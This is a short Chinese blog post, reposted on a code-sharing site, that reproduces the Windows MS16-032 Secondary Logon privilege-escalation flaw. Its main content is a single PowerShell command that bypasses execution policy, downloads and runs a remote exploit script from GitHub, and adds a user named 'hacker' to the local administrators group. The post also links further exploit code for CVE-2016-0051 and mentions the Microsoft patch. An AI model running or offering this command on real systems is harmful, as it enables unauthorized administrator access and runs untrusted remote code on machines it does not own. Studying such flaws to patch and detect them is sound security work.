MS16-032 漏洞復現


exploit-db的詳情:  https://www.exploit-db.com/exploits/39574/

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege

 

0x01使用標准用戶登陸win7,下圖是當前登錄用戶abc的詳細信息。

0x02直接執行命令進行提權,簡單粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

0x03下面就是見證奇跡的時刻了

 

該漏洞危害十分嚴重,如圖在2008server上測試

本地測試如圖,被安全軟件檢測到。

微軟官方在2016年3月8日發布了補丁KB3139914。

 

附上利用提取文件下載地址https://github.com/hexx0r/CVE-2016-0051


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM